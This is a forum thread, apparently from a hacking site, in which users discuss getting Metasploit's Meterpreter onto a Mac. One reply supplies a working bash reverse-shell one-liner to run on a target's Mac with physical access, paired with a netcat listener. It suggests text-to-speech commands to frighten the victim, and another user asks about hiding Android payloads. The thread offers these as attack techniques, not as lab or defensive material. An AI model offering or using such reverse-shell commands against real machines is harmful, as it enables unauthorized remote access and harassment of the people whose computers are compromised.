Forum Thread: Meterpreter on a Mac

Hey guys,

Does anyone know if there is a way to get meterpreter onto a mac?

Join the Next Reality AR Community

Get the latest in AR — delivered straight to your inbox.

9 Responses

There are plenty of payloads compatible with OSX in metasploit so I guess it's possible, although I don't have much personal experience with macs. So whatever OS is being used on the mac, there's probably a compatible payload, you just have to look at the right place :D

EDIT: I just realised you were looking for a meterpreter, and I can't see one in metasploit, so I guess there is no meterpreter for OSX :/

EDIT 2 (I'm really organised *sigh*): I believe there is a java meterpreter, so if the mac is running java you can get the meterpreter onto it this way

I don't, but why don't you use a regular backdoor?

If you have physical access to the target Mac, type:

bash -i >& /dev/tcp/"Your IP Address"/"The port you want to use" 0>&1

...on the Mac's terminal.

On your computer, phone or laptop, use netcat to listen on the port you want to use. The command for this depends on what version of netcat you are using, but it usually looks like:

nc -l -p The port you want to use

Have fun!

Oh, and also make sure to use TTS to freak your target out.
The command is usually:

say "Whatever you want to say"

Yes! This is my favorite mac hacking method! It's 1 command, and it gets you so far. I made a whole tutorial about this one method and a followup tutorial just about fun commands to freak out the target. Any who, thanks for the share!

We have reverse_TCP for both win and mac.

I am pretty sure meterpreter is windows only though. Commands from the reverse shell however may be as powerful.

There are meterpreter payloads for Linux, BSD and Android. Unfortunately, not all the meterpreter commands and scripts are ported for each of them.

Thanks for clarifying.

@OTW, have you made a tutorial on how to compromise an Android device using Metasploit? I remember trying that once, but I ended up with a .apk file that didn't connect back to me and refused to be hidden from the menu screen (making it extremely easy to spot).


May I ask why my comment was disliked, is it because there is no such thing as a java meterpreter or what else did I get wrong? :D Such knowledge would be of great use, thanks in advance.

Share Your Thoughts

  • Hot
  • Active